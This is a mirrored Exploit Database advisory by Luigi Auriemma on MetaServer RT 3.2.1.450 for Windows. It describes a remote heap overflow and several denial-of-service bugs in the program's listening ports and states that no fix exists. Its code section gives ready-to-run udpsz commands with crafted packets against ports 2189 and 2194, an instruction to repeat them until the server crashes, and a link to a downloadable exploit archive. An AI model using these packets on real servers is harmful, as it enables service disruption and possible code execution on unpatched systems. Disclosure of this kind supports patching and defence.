MetaServer RT 3.2.1.450 – Multiple Vulnerabilities

• Exploit Database
• 102 阅读

• 作者： Luigi Auriemma
  日期： 2011-09-21
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17879/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100

  #######################################################################   Luigi Auriemma   Application:MetaServer RT http://www.traderssoft.com/ts/msrt/ Versions: <= 3.2.1.450 Platforms:Windows Bugs: A] heap overflow B] various Denials of Service Exploitation: remote Date: 19 Sep 2011 Author: Luigi Auriemma e-mail: aluigi@autistici.org web:aluigi.org     #######################################################################     1) Introduction 2) Bugs 3) The Code 4) Fix     #######################################################################   =============== 1) Introduction ===============     From vendor&apos;s website: "MetaServer RT allows to use MetaStock 6.52/7.x/8.x/9.x/10.x/11.x (eSignal version) and TradeStartion2000i/ProSuite2000i with datafeeds that are not supported originally."     #######################################################################   ======= 2) Bugs =======     The program listens on ports 2189, 2192 and 2194.   ---------------- A] heap overflow ----------------   Through an interrupted connection with multiple packets on port 2189 and a subsequent reconnection it&apos;s possible to cause a heap overflow and the relative write4. Both the "MESSA" and "ROSCO" commands can be used.     ----------------------------- B] various Denials of Service -----------------------------   Various invalid memory accesses and freezing of the program.     #######################################################################   =========== 3) The Code ===========     http://aluigi.org/testz/udpsz.zip https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17879.zip   A] udpsz -C "cdab0000 00000000 ffff0000 00000000 ffffffff 524f53434f" -l 0 -T -1 SERVER 2189 0xffff   stop after at least 50 dots and relaunch the command again till the crashing of the server during a memcpy.     B] udpsz -b 0x80 -T SERVER 2194 1000 udpsz -C "cdab0000 00000000 00ffffff 00000000 00000000 524f53434f" -T SERVER 2189 -1 ...others...     #######################################################################   ====== 4) Fix ======     No fix.     #######################################################################